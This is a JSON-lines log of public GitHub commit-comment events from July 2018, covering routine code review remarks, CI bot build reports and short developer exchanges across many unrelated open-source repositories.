{"id":"7962938141","type":"CommitCommentEvent","actor":{"login":"ddnexus"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701812,"position":7,"line":7,"path":"lib/pagy/extras/out_of_range.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:47:40Z","updated_at":"2018-07-13T15:47:40Z","author_association":"OWNER","body":"Well, I can rename it, but the problem ov breaking will just move from `create` to  `initialize_without_out_of_range` :)"}},"created_at":"2018-07-13T15:47:40Z"}
{"id":"7962939695","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701815,"position":55,"line":55,"path":"test/pagy/extras/out_of_range_test.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:47:58Z","updated_at":"2018-07-13T15:47:58Z","author_association":"CONTRIBUTOR","body":"(prefer no newlines since that's more common and consistent with method definitions)"}},"created_at":"2018-07-13T15:47:58Z"}
{"id":"7962940134","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29701816,"position":83,"line":80,"path":"src/sass/_base.scss","commit_id":"167a497ac68504a317dbe9712d77b7eed4013a3f","created_at":"2018-07-13T15:48:04Z","updated_at":"2018-07-13T15:48:04Z","author_association":"CONTRIBUTOR","body":"如非必要，不要直接對 id 寫樣式，改用 class"}},"created_at":"2018-07-13T15:48:04Z"}
{"id":"7962941462","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29701819,"position":null,"line":null,"path":null,"commit_id":"9aa25114bede6e21f2e77d02db6cf80104fe9ff6","created_at":"2018-07-13T15:48:19Z","updated_at":"2018-07-13T15:48:19Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-484](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-484).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-484-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-13T15:48:19Z"}
{"id":"7962944651","type":"CommitCommentEvent","actor":{"login":"shalien"},"repo":{"name":"topjohnwu/MagiskManager"},"payload":{"comment":{"id":29701823,"position":null,"line":null,"path":null,"commit_id":"b885ccbd632eddcabc13781a10d3fec4a4215b39","created_at":"2018-07-13T15:48:57Z","updated_at":"2018-07-13T15:48:57Z","author_association":"NONE","body":"Last version of Magisk Manager 5.8.1 resolve this issue. Using it with latest beta Magisk flashed via Custom Recovery"}},"created_at":"2018-07-13T15:48:57Z"}
{"id":"7962945303","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701827,"position":null,"line":null,"path":null,"commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:49:05Z","updated_at":"2018-07-13T15:49:05Z","author_association":"CONTRIBUTOR","body":"this looks like it solves the issue, thanks!\r\nA PR to discuss instead of a straight up release would have been nice though."}},"created_at":"2018-07-13T15:49:05Z"}
{"id":"7962948074","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29701832,"position":null,"line":null,"path":null,"commit_id":"22c8b430e24cd7f9e17e48abf436c299e8b6cf9a","created_at":"2018-07-13T15:49:36Z","updated_at":"2018-07-13T15:49:36Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-13T15:49:36Z"}
{"id":"7962950215","type":"CommitCommentEvent","actor":{"login":"Tafoid"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29701837,"position":5,"line":1291,"path":"hash/x68k_flop.xml","commit_id":"a5bca54a8a014e4c35a7a4ea19a48d70b40c8850","created_at":"2018-07-13T15:50:00Z","updated_at":"2018-07-13T15:50:00Z","author_association":"CONTRIBUTOR","body":"xmllint or internal -validation didn't seem to care about that.  I will work on correcting that and other oversights in the hashes project wide."}},"created_at":"2018-07-13T15:50:00Z"}
{"id":"7962953596","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29701842,"position":7,"line":7,"path":"src/sass/_card.scss","commit_id":"167a497ac68504a317dbe9712d77b7eed4013a3f","created_at":"2018-07-13T15:50:39Z","updated_at":"2018-07-13T15:50:39Z","author_association":"CONTRIBUTOR","body":"如果需要寫到一些很奇怪的計算或數字，代表這邊有優化空間，看看是哪邊的寫法可以調整"}},"created_at":"2018-07-13T15:50:39Z"}
{"id":"7962956422","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701846,"position":7,"line":7,"path":"lib/pagy/extras/out_of_range.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:51:11Z","updated_at":"2018-07-13T15:51:11Z","author_association":"CONTRIBUTOR","body":"try the `prepend` it's neat and makes the intention of the code very clear\r\ninitialize_without_out_of_range is already a good step forward since it reveals the intention more and will be understandable in a backtrace too"}},"created_at":"2018-07-13T15:51:11Z"}
{"id":"7962958006","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29701850,"position":1,"line":1,"path":"src/sass/_card.scss","commit_id":"167a497ac68504a317dbe9712d77b7eed4013a3f","created_at":"2018-07-13T15:51:28Z","updated_at":"2018-07-13T15:51:28Z","author_association":"CONTRIBUTOR","body":"不用特別包一層 body，所有元素都會在 body 裡面"}},"created_at":"2018-07-13T15:51:28Z"}
{"id":"7962960479","type":"CommitCommentEvent","actor":{"login":"dereuromark"},"repo":{"name":"rrd108/cakephp-datalist"},"payload":{"comment":{"id":29701856,"position":null,"line":null,"path":null,"commit_id":"00f1a89ae4d5022b53b0540df673fd9a84fef2cc","created_at":"2018-07-13T15:51:56Z","updated_at":"2018-07-13T15:51:56Z","author_association":"NONE","body":"I dont think that works as expected. See my post or my other plugins for details."}},"created_at":"2018-07-13T15:51:56Z"}
{"id":"7962960562","type":"CommitCommentEvent","actor":{"login":"Whyounes"},"repo":{"name":"NextmediaMa/nextstarter"},"payload":{"comment":{"id":29701857,"position":13,"line":13,"path":"htdocs/content/themes/nextstarter-theme/resources/models/Post.php","commit_id":"a8cc4579a711e9ab80675ce544867d36458a68f3","created_at":"2018-07-13T15:51:57Z","updated_at":"2018-07-13T15:51:57Z","author_association":"NONE","body":"I suggest we create our own `Theme\\Models\\Model` and extend `Eloquent\\Model`."}},"created_at":"2018-07-13T15:51:57Z"}
{"id":"7962962104","type":"CommitCommentEvent","actor":{"login":"dark-1"},"repo":{"name":"topjohnwu/MagiskManager"},"payload":{"comment":{"id":29701862,"position":null,"line":null,"path":null,"commit_id":"b885ccbd632eddcabc13781a10d3fec4a4215b39","created_at":"2018-07-13T15:52:17Z","updated_at":"2018-07-13T15:52:17Z","author_association":"NONE","body":"> Last version of Magisk Manager 5.8.1 resolve this issue. Using it with latest beta Magisk flashed via Custom Recovery   \r\n    \r\nHo! Sorry !! I did not check for New release of APK, my bad.   \r\nI was outdated , sorry for troubles.    \r\n    \r\nBest regards 👍  "}},"created_at":"2018-07-13T15:52:17Z"}
{"id":"7962965122","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29701866,"position":null,"line":null,"path":null,"commit_id":"f9731a3a08b89f257672475992be5372191cff74","created_at":"2018-07-13T15:52:51Z","updated_at":"2018-07-13T15:52:51Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-41](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-41).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-41-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-13T15:52:51Z"}
{"id":"7962971245","type":"CommitCommentEvent","actor":{"login":"mperego"},"repo":{"name":"gahansen/Albany"},"payload":{"comment":{"id":29701876,"position":null,"line":null,"path":null,"commit_id":"d1c3dc186302c285103f55dc078f09cc33fc0439","created_at":"2018-07-13T15:54:01Z","updated_at":"2018-07-13T15:54:01Z","author_association":"COLLABORATOR","body":"@bartgol Thanks. I changed the return type of Petra::TpetraMap_To_EpetraMap from Teuchos::RCP<Epetra_Map> to Teuchos::RCP<const Epetra_Map>."}},"created_at":"2018-07-13T15:54:01Z"}
{"id":"7962977623","type":"CommitCommentEvent","actor":{"login":"ddnexus"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701881,"position":19,"line":19,"path":"lib/pagy/extras/out_of_range.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:55:13Z","updated_at":"2018-07-13T15:55:13Z","author_association":"OWNER","body":"I was trying to avoid extra conditions... it would be checking `@out_of_range && @vars[:out_of_range_mode] == :empty_page`... I will think about \"hacky\" :)"}},"created_at":"2018-07-13T15:55:13Z"}
{"id":"7962979599","type":"CommitCommentEvent","actor":{"login":"hoyt-harness"},"repo":{"name":"Positronikal/CarnivoreLE"},"payload":{"comment":{"id":29701883,"position":null,"line":null,"path":null,"commit_id":"142689d7a41afabaaf0aacc027d6cff0f3523d89","created_at":"2018-07-13T15:55:34Z","updated_at":"2018-07-13T15:55:34Z","author_association":"CONTRIBUTOR","body":"Reference issue #9 "}},"created_at":"2018-07-13T15:55:34Z"}
{"id":"7962983452","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29701890,"position":50,"line":50,"path":"src/sass/_card.scss","commit_id":"167a497ac68504a317dbe9712d77b7eed4013a3f","created_at":"2018-07-13T15:56:18Z","updated_at":"2018-07-13T15:56:18Z","author_association":"CONTRIBUTOR","body":"如果寫到一系列的樣式，發現結構都是一樣的，可以考慮提出為一個 mixin\r\n通常我是寫到超過 3 個就會提出：\r\n\r\n```scss\r\n@mixin something($bg, $color, $top, $left) {\r\n  // your code\r\n}\r\n```"}},"created_at":"2018-07-13T15:56:18Z"}
{"id":"7962993884","type":"CommitCommentEvent","actor":{"login":"Tomcoong"},"repo":{"name":"travis-ci/docs-travis-ci-com"},"payload":{"comment":{"id":29701901,"position":4,"line":13,"path":"_data/databases.yml","commit_id":"7198d5dca42fefbc3dc07e3458ebd3dfa776ea37","created_at":"2018-07-13T15:58:16Z","updated_at":"2018-07-13T15:58:16Z","author_association":"NONE","body":"Neo4J"}},"created_at":"2018-07-13T15:58:16Z"}
{"id":"7962995839","type":"CommitCommentEvent","actor":{"login":"ddnexus"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701904,"position":55,"line":55,"path":"test/pagy/extras/out_of_range_test.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:58:40Z","updated_at":"2018-07-13T15:58:40Z","author_association":"OWNER","body":"Thanks"}},"created_at":"2018-07-13T15:58:40Z"}
{"id":"7962996441","type":"CommitCommentEvent","actor":{"login":"Argen14"},"repo":{"name":"Argen14/avengers"},"payload":{"comment":{"id":29701905,"position":null,"line":null,"path":null,"commit_id":"acc06fae034fb0976b336beed58aec44ae47f32d","created_at":"2018-07-13T15:58:47Z","updated_at":"2018-07-13T15:58:47Z","author_association":"OWNER","body":"aquí se agrego una nueva misión #6 "}},"created_at":"2018-07-13T15:58:47Z"}
{"id":"7962997422","type":"CommitCommentEvent","actor":{"login":"ddnexus"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701908,"position":null,"line":null,"path":null,"commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:58:59Z","updated_at":"2018-07-13T15:58:59Z","author_association":"OWNER","body":"impatience :)"}},"created_at":"2018-07-13T15:58:59Z"}
{"id":"7963003112","type":"CommitCommentEvent","actor":{"login":"ErickCru"},"repo":{"name":"Argen14/avengers"},"payload":{"comment":{"id":29701917,"position":null,"line":null,"path":null,"commit_id":"4c7eddfc0683255e43bda0d3148e895dedb5c4fa","created_at":"2018-07-13T16:00:04Z","updated_at":"2018-07-13T16:00:04Z","author_association":"COLLABORATOR","body":"Se agrego a una nueva mision.. #8 "}},"created_at":"2018-07-13T16:00:04Z"}
{"id":"7963003305","type":"CommitCommentEvent","actor":{"login":"timmyc"},"repo":{"name":"woocommerce/wc-admin"},"payload":{"comment":{"id":29701918,"position":16,"line":54,"path":"tests/js/setup-globals.js","commit_id":"de487110841133568cdb8c025424067d28c38f7e","created_at":"2018-07-13T16:00:08Z","updated_at":"2018-07-13T16:00:08Z","author_association":"COLLABORATOR","body":"Ah nice! I was close to this fix, but was trying to manually setup the Jed instance, thanks for sorting this out Justin"}},"created_at":"2018-07-13T16:00:08Z"}
{"id":"7963007899","type":"CommitCommentEvent","actor":{"login":"mahmudul89277"},"repo":{"name":"mahmudul89277/Metalicca"},"payload":{"comment":{"id":29701934,"position":null,"line":null,"path":null,"commit_id":"4c58788883344aabf707a4b266f4acc0b2c448f5","created_at":"2018-07-13T16:00:55Z","updated_at":"2018-07-13T16:00:55Z","author_association":"OWNER","body":"# Bootstrap 4 Starter Pack\r\nIncludes complete Bootstrap 4 dev environment with gulp and sass\r\n# Install Dependencies\r\nnpm install \r\n# Compile Sass & Run Dev Server\r\nnpm start\r\n\r\nFiles are compiled into /src"}},"created_at":"2018-07-13T16:00:55Z"}
{"id":"7963008719","type":"CommitCommentEvent","actor":{"login":"vladimirdolzhenko"},"repo":{"name":"elastic/elasticsearch"},"payload":{"comment":{"id":29701935,"position":38,"line":67,"path":"server/src/test/java/org/elasticsearch/repositories/blobstore/BlobStoreRepositoryTests.java","commit_id":"8dfa60d218accad78501952d9e1e41e92cb3e4d2","created_at":"2018-07-13T16:01:04Z","updated_at":"2018-07-13T16:01:04Z","author_association":"CONTRIBUTOR","body":"agree"}},"created_at":"2018-07-13T16:01:04Z"}
{"id":"7963010815","type":"CommitCommentEvent","actor":{"login":"artembilan"},"repo":{"name":"spring-projects/spring-kafka"},"payload":{"comment":{"id":29701938,"position":null,"line":null,"path":null,"commit_id":"db0516d786d044cd83237719b8e715be30c05f91","created_at":"2018-07-13T16:01:28Z","updated_at":"2018-07-13T16:01:28Z","author_association":"MEMBER","body":"This has not been back-ported to the `1.0.x`, even not to the `1.1.x`. Your version is already EOL for a while.\r\nConsider to upgrade to the latest one, at least to the `1.3.5` if can't move to Spring 5: https://spring.io/projects/spring-kafka#learn"}},"created_at":"2018-07-13T16:01:28Z"}
{"id":"7963013875","type":"CommitCommentEvent","actor":{"login":"gmbnomis"},"repo":{"name":"pulp/pulp_file"},"payload":{"comment":{"id":29701942,"position":79,"line":39,"path":"pulp_file/app/tasks/synchronizing.py","commit_id":"c23bec069e12a485000f048e486e1d89cce65beb","created_at":"2018-07-13T16:02:03Z","updated_at":"2018-07-13T16:02:03Z","author_association":"NONE","body":"I think the first stage future should not be scheduled by the plugin (and if it is scheduled by the plugin, it should not be scheduled like this):\r\n\r\nIf `fetch_manifest` throws an exception, there is nothing that will catch it (Python usually emits a warning message when it destroys a future that has a stored exception). What's worse: `fetch_manifest` will not generate the `None` entry that signals completion in this case. Thus, the remainder of the pipeline will wait forever (unless Python is able to detect that no progress is being made(?)).\r\n\r\nIMHO, the easiest solution for this is to make the future part of the asyncio.gather call in pulp core. Using default parameters, `gather` immediately propagates exceptions. (I am not sure what happens to the remaining futures though. Maybe one needs to cancel them.)\r\n\r\nAdditionally, I think that the plugin writer should not create the first queue. The creation of the queues should be part of the pipeline (the type of the queue might change in the future for example). \r\n\r\nThus, I think the plugin API for the first stage could be:\r\n\r\n- a coroutine function taking a queue, e.g. `async def  some_function(out_q)` which is passed to DeclarativeVersion: `DeclarativeVersion(some_function, repository).create()`. DeclarativeVersion creates all the queues then and passes the respective queue as a parameter to the function when creating the future for it. Or:\r\n- a class with an abstract coroutine method `async def  gen_declarative_content(self, out_q)` that the plugin writer will need to implement\r\n\r\nThe advantage of the latter is that it is easier to store additional parameters (like `remote`) in the class case. (coroutine function case would probably need to create a partial function)\r\n\r\n"}},"created_at":"2018-07-13T16:02:03Z"}
{"id":"7963018072","type":"CommitCommentEvent","actor":{"login":"ddnexus"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701952,"position":26,"line":26,"path":"lib/pagy/extras/out_of_range.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T16:02:54Z","updated_at":"2018-07-13T16:02:54Z","author_association":"OWNER","body":"True! Thanks!"}},"created_at":"2018-07-13T16:02:54Z"}
{"id":"7963024949","type":"CommitCommentEvent","actor":{"login":"moz4r"},"repo":{"name":"MyRobotLab/myrobotlab"},"payload":{"comment":{"id":29701967,"position":null,"line":null,"path":null,"commit_id":"f30551dd086343fc20ef1f281fe905fa8eb19f81","created_at":"2018-07-13T16:04:19Z","updated_at":"2018-07-13T16:04:19Z","author_association":"CONTRIBUTOR","body":"without code formatter : \r\n\r\n+        if (error.contains(\"KeyboardInterrupt\")) {  \r\n+          warn(\"Python process killed !\");  \r\n+          log.warn(\"Python process killed : {}\", error);  \r\n+        } else {  \r\n+          invoke(\"publishStatus\", Status.error(e)\r\n \r\n..."}},"created_at":"2018-07-13T16:04:19Z"}
{"id":"7963029195","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29701970,"position":16,"line":16,"path":"src/sass/_trans.scss","commit_id":"167a497ac68504a317dbe9712d77b7eed4013a3f","created_at":"2018-07-13T16:05:11Z","updated_at":"2018-07-13T16:05:11Z","author_association":"CONTRIBUTOR","body":"寫純 css 這樣 OK，但是寫 scss 可以分別在各自的區塊用 extend 的：\r\n```scss\r\n%something {\r\n  transition: .5s;\r\n  position: absolute;\r\n}\r\n\r\n.cd-prpl {\r\n  @extend %something;\r\n}\r\n.cd-org {\r\n  @extend %something\r\n}\r\n```\r\n\r\n但是更好的做法應該是獨立為一個抽象的 class ，再對該 class 下樣式：\r\n```scss\r\n.cd {\r\n  transition: .5s;\r\n  position: absolute;\r\n  &-prpl {\r\n  }\r\n  &-red {\r\n  }\r\n  &-org {\r\n  }\r\n}\r\n```"}},"created_at":"2018-07-13T16:05:11Z"}
{"id":"7963030538","type":"CommitCommentEvent","actor":{"login":"rrd108"},"repo":{"name":"rrd108/cakephp-datalist"},"payload":{"comment":{"id":29701974,"position":null,"line":null,"path":null,"commit_id":"00f1a89ae4d5022b53b0540df673fd9a84fef2cc","created_at":"2018-07-13T16:05:27Z","updated_at":"2018-07-13T16:05:27Z","author_association":"OWNER","body":"I see. Should be ok now."}},"created_at":"2018-07-13T16:05:27Z"}
{"id":"7963031038","type":"CommitCommentEvent","actor":{"login":"ezgisuzgun"},"repo":{"name":"codeformuenster/datadive-on-time-series"},"payload":{"comment":{"id":29701975,"position":null,"line":null,"path":null,"commit_id":"d4ea691446119df50bc250019888c02d8baf6f6e","created_at":"2018-07-13T16:05:33Z","updated_at":"2018-07-13T16:05:33Z","author_association":"NONE","body":"Hi,\r\nI am trying to do forecasting on time series data with SVR and had a look at your code. I couldn't understand what the code below does. I would be glad if you can respond. It is the first time I am dealing with time series data and dont know what steps i should follow before using SVR. \r\nhere is the code:\r\nweatherX2['date'] = weatherX2['date'].apply(lambda x: datetime.datetime.strptime(x, \"%Y-%m-%d\").strftime('%-m/%-d/%Y') )\r\nweatherX2 = weatherX2.ix[w2start:,0:2].join(weatherX2.ix[w2start:,4])\r\n\r\nThanks!\r\nEzgi"}},"created_at":"2018-07-13T16:05:33Z"}
{"id":"7963032831","type":"CommitCommentEvent","actor":{"login":"brianzelip"},"repo":{"name":"tachyons-css/tachyons"},"payload":{"comment":{"id":29701978,"position":null,"line":null,"path":null,"commit_id":"74fc9db2b3475a77f963ad02da6c96ebf65f82c7","created_at":"2018-07-13T16:05:54Z","updated_at":"2018-07-13T16:05:54Z","author_association":"NONE","body":"😺"}},"created_at":"2018-07-13T16:05:54Z"}
{"id":"7963033325","type":"CommitCommentEvent","actor":{"login":"Ana06"},"repo":{"name":"SwellRT/jetpad"},"payload":{"comment":{"id":29701979,"position":30,"line":26,"path":"src/app/components/pad/pad.component.ts","commit_id":"e7656b66086bb722eaf35fde4b31a315ee8f40da","created_at":"2018-07-13T16:06:00Z","updated_at":"2018-07-13T16:06:00Z","author_association":"MEMBER","body":"@pablojan do we need this or was for testing puposes and you forgot to remove it? :thinking: "}},"created_at":"2018-07-13T16:06:00Z"}
{"id":"7963040339","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29701987,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-13T16:07:21Z","updated_at":"2018-07-13T16:07:21Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1686 of 1686 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-13T16:07:21Z"}
{"id":"7963040562","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Sprint-Challenge--Redux"},"payload":{"comment":{"id":29701988,"position":null,"line":null,"path":null,"commit_id":"4662c243c3fb76fbfe01f09a2f0a533707cfc802","created_at":"2018-07-13T16:07:24Z","updated_at":"2018-07-13T16:07:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [GET '/smurfs'](https://trello.com/c/VwMF86aI/3-get-smurfs)"}},"created_at":"2018-07-13T16:07:24Z"}
{"id":"7963045752","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29701994,"position":98,"line":88,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-13T16:08:23Z","updated_at":"2018-07-13T16:08:23Z","author_association":"NONE","body":"It is much simpler than that. The deadline is only here to separate who can do when. Cf. my comment above:\r\n\r\n> You do not check the deadline on withdraw?\r\n\r\nYou said:\r\n\r\n> Adding Alice's address to the Keccak256 function I guess.\r\n\r\nAnd that's what you have to do."}},"created_at":"2018-07-13T16:08:23Z"}
{"id":"7963051510","type":"CommitCommentEvent","actor":{"login":"ljod"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29702001,"position":null,"line":null,"path":null,"commit_id":"85064d3dc4d56ab4e48d34a79cfa992afe3a80ff","created_at":"2018-07-13T16:09:35Z","updated_at":"2018-07-13T16:09:35Z","author_association":"NONE","body":"Please add writing also. Is there a round trip test as well?"}},"created_at":"2018-07-13T16:09:35Z"}
{"id":"7963052206","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29702005,"position":null,"line":null,"path":null,"commit_id":"17d0631fb1361e26b6e948137846b3d445a9fffe","created_at":"2018-07-13T16:09:45Z","updated_at":"2018-07-13T16:09:45Z","author_association":"NONE","body":"PrepFor90 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2934 of 2934 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-17d0631fb1361e26b6e948137846b3d445a9fffe-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-17d0631fb1361e26b6e948137846b3d445a9fffe-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T16:09:45Z"}
{"id":"7963057033","type":"CommitCommentEvent","actor":{"login":"creatorlxd"},"repo":{"name":"ChinaCreators/LHL"},"payload":{"comment":{"id":29702013,"position":null,"line":null,"path":null,"commit_id":"7d4a84a5e7aa9da288c4869959bc8527ad190132","created_at":"2018-07-13T16:10:44Z","updated_at":"2018-07-13T16:10:44Z","author_association":"COLLABORATOR","body":"@xsun2001 我本地生成DLL不在release文件夹。。。"}},"created_at":"2018-07-13T16:10:44Z"}
{"id":"7963068001","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29702025,"position":null,"line":null,"path":null,"commit_id":"fd3a72b65bb4401a7c4451096e31149396139fa2","created_at":"2018-07-13T16:13:01Z","updated_at":"2018-07-13T16:13:01Z","author_association":"NONE","body":"Now you can see the power of IDA pro XD"}},"created_at":"2018-07-13T16:13:01Z"}
{"id":"7963069347","type":"CommitCommentEvent","actor":{"login":"tpilz"},"repo":{"name":"tpilz/lumpR"},"payload":{"comment":{"id":29702030,"position":78,"line":222,"path":"R/reservoir_strategic.R","commit_id":"f2f62dc528eb9f1d0df70a2be04bfa7142e95157","created_at":"2018-07-13T16:13:19Z","updated_at":"2018-07-13T16:13:19Z","author_association":"OWNER","body":"That does not work for `res_file=NULL`"}},"created_at":"2018-07-13T16:13:19Z"}
{"id":"7963069886","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29702033,"position":5,"line":4,"path":"contracts/Ownable.sol","commit_id":"ce742760c48dc09e81ab99f394fd86520eba0979","created_at":"2018-07-13T16:13:27Z","updated_at":"2018-07-13T16:13:27Z","author_association":"NONE","body":"`internal` can still be modifier by mistake by the developer."}},"created_at":"2018-07-13T16:13:27Z"}
{"id":"7963070742","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29702036,"position":40,"line":40,"path":"src/sass/_trans.scss","commit_id":"167a497ac68504a317dbe9712d77b7eed4013a3f","created_at":"2018-07-13T16:13:37Z","updated_at":"2018-07-13T16:13:37Z","author_association":"CONTRIBUTOR","body":"發現 pattern 時嘗試提出來，維護時會更容易看懂他們之間的關聯"}},"created_at":"2018-07-13T16:13:37Z"}
{"id":"7963071513","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29702041,"position":14,"line":15,"path":"contracts/Ownable.sol","commit_id":"ce742760c48dc09e81ab99f394fd86520eba0979","created_at":"2018-07-13T16:13:46Z","updated_at":"2018-07-13T16:13:46Z","author_association":"NONE","body":"It is easier to read if you use more than 1 line, IMO."}},"created_at":"2018-07-13T16:13:46Z"}
{"id":"7963072137","type":"CommitCommentEvent","actor":{"login":"Profpatsch"},"repo":{"name":"purescript/purescript-prelude"},"payload":{"comment":{"id":29702044,"position":null,"line":null,"path":null,"commit_id":"3b0d306c0fa20af4803fdad2313f250d4e388d35","created_at":"2018-07-13T16:13:54Z","updated_at":"2018-07-13T16:13:54Z","author_association":"NONE","body":"Yes, it was more of a joke, so don’t worry too much about it. But maybe adding a “disclaimer comment” is a good idea?"}},"created_at":"2018-07-13T16:13:54Z"}
{"id":"7963072157","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29702045,"position":5,"line":104,"path":"mcs/class/corlib/Makefile","commit_id":"262c5f40cb6b6fa70d51c7744a1b5a9d1023c77a","created_at":"2018-07-13T16:13:54Z","updated_at":"2018-07-13T16:13:54Z","author_association":"MEMBER","body":"How does this not break 32bit builds?"}},"created_at":"2018-07-13T16:13:54Z"}
{"id":"7963073301","type":"CommitCommentEvent","actor":{"login":"thiagoarrais"},"repo":{"name":"thiagoarrais/babel"},"payload":{"comment":{"id":29702050,"position":5,"line":92,"path":"packages/babel-preset-env/data/plugin-features.js","commit_id":"df2c09f48079a1fd20fb638a03d6eb6d683f5d8b","created_at":"2018-07-13T16:14:10Z","updated_at":"2018-07-13T16:14:10Z","author_association":"OWNER","body":"looking a little closer, the order of entries seems to affect the order in which babel applies the plugins. will keep this ordering for now 'cause I don't want to debug this. plus, if this really lands, the other proposals are really likely to be renamed too.\r\n\r\nRef.: https://github.com/babel/babel/pull/7065#issuecomment-395959112"}},"created_at":"2018-07-13T16:14:10Z"}
